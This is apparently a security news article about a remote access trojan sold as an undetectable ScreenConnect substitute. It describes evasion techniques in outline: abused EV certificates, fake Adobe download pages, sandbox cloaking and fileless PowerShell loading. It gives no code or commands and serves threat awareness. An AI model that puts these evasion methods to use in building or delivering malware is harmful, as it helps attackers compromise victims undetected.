Undetectable RAT Emerges as ScreenConnect FUD Replacement

Cybercriminals have begun marketing a new underground Remote Access Trojan (RAT), pitched as a fully undetectable (FUD) alternative to the legitimate remote administration tool ScreenConnect.

The malware is being positioned as a professional “crimeware-as-a-service” product, with the seller promising evasion of modern security technologies through advanced stealth mechanisms.

Bypassing Security With Advanced Evasion

The RAT’s highlight feature is its ability to bypass key defensive layers, including Google Chrome warnings and Microsoft’s Windows SmartScreen. Instead of triggering reputation-based defenses, the malware is bundled with a valid Extended Validation (EV) certificate.

These high-assurance certificates are traditionally used to prove organizational legitimacy, displaying a company name in the browser bar. In this context, however, the abuse of an EV certificate provides a veneer of legitimacy and helps suppress browser and operating system security alerts.

The advertisements shared by the threat actor reveal social engineering delivery methods consistent with classic malware campaigns. For instance, a fake Adobe Acrobat Reader landing page, styled with authentic branding, attempts to trick users into downloading the RAT.

To further evade discovery, the package employs antibot mechanisms to detect and restrict access from automated scanners, sandboxes, or security researchers.

Cloaked landing pages ensure benign content is presented during automated analysis, with the real payload only delivered to intended targets.

These anti-analysis features are accompanied by a fileless execution technique, leveraging PowerShell commands to load malicious executables directly into memory.

This approach bypasses traditional antivirus engines focused on file scanning, offering threat actors a hidden backdoor for interactive intrusion campaigns.

FUD Malware and Loader Capabilities

The seller has openly promoted the tool as a dual-purpose RAT and loader. In practice, this means it can serve as both a persistent surveillance mechanism and a staging platform for additional payloads, including ransomware, spyware, and credential-stealing trojans.

The RAT includes a remote viewer capability, enabling the attacker to visually monitor and directly control a compromised desktop session in real time. Such visibility provides opportunities for manual exfiltration of sensitive data, credential harvesting, or lateral movement across networks.

By offering a demo to potential buyers and guaranteeing delivery of the infection package within 24 working hours, the seller underscores the growing professionalism of the cybercrime ecosystem.

Instead of crude malware executables, adversaries are increasingly peddling ready-to-use, stealth-tested tools designed to bypass enterprise-grade defenses.

Security experts warn that this new RAT represents more than just another commodity malware: it highlights how malicious actors continue to exploit trust in legitimate processes and digital certificates.

By mimicking tools like ScreenConnect and exploiting browser trust indicators, adversaries are blurring the line between legitimate software and strategic intrusion platforms, ultimately lowering the barrier to entry for cybercriminals seeking undetectable access solutions.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post Undetectable RAT Emerges as ScreenConnect FUD Replacement appeared first on Cyber Security News.